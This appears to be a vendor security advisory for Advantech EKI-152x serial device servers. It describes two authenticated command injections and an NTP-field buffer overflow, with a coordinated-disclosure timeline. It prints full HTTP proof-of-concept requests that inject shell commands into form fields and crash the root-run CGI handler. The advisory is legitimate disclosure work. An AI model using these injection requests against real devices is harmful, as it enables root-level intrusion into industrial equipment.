• 2023-06-05: Vendor asked for clarification; Sent further explaination to the contact; Vendor contact said he knows a solution.
• 2023-06-22: Asked for an update; Contact stated that the beta firmware should resolve the issues.
• 2023-06-27: Asked for the release date.
• 2023-07-04: Contact stated, that they are currently doing QA tests.
• 2023-07-06: Asked if issue 1.1 is really resolved to be released; Vendor stated that it can be published.
• 2023-07-17: Assigned CVE numbers for the issues. Asked for an update.
• 2023-07-18: Vendor contact stated that the firmware will be released end of July.
• 2023-08-07: Asked contact for the new firmware version.
• 2023-08-08: Received version 1.26 as the official released firmware with fixes.
  Coordinated release of security advisory.

Advantech EKI-1524/1522/1521 devices are prone to authenticated command injections and a buffer overflow vulnerability. These vulnerabilities can be used to execute arbitrary commands on OS level.

„Advantech’s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.“

Source: https://www.advantech.com/en/about

EKI-1524-CE series / 1.21
EKI-1522-CE series / 1.21
EKI-1521-CE series / 1.21

1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)
The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors.

2) Buffer Overflow (CVE-2023-2575)
The web server is prone to a buffer overflow, triggered due to missing input lenght validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked.

The web server is prone to two authenticated command injections via POST parameters. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background.

The following POST request executes the command “;ping 10.0.0.1” on the system:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

It is also possible to execute this command without any interceptor proxy by enclose it with „;“, which results in the string “;ping 10.0.0.1;”.

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 823
Origin: http://172.16.0.97
Connection: close
Referer: http://172.16.0.97/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaa […] aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa […]
&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

/ # *** Error in `./index.cgi‘: free(): invalid next size (normal): 0x00069828 ***
*** Error in `./index.cgi‘: malloc(): memory corruption: 0x00069898 ***

/ # ps
PID USER COMMAND
[…]
935 root ./index.cgi func=setsys
959 root ./index.cgi func=setsys
983 root ./index.cgi func=setsys
[…]

Update the product to the latest available firmware version.

None

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.

• 2023-03-08: Contacting Advantech via Service Request form; No answer.
• 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendor responded that EKI-1524/1522/1521 series are affected.
• 2023-03-20: Asked for status update.
• 2023-03-21: Vendor responded that the firwmare is currently under testing.
• 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor.
• 2023-04-01: Vendor asked multiple question.
• 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10.
• 2023-04-10: Clarified further issues.
• 2023-04-23: Vendor sent notification that a beta release of the firmware is available.
• 2023-05-02: Vendor sent notification that a new firwmare release is online.
• 2023-05-04: Asked vendor if the advisory can be published earlier than agreed.
• 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed.
• 2023-05-11: Coordinated release of security advisory.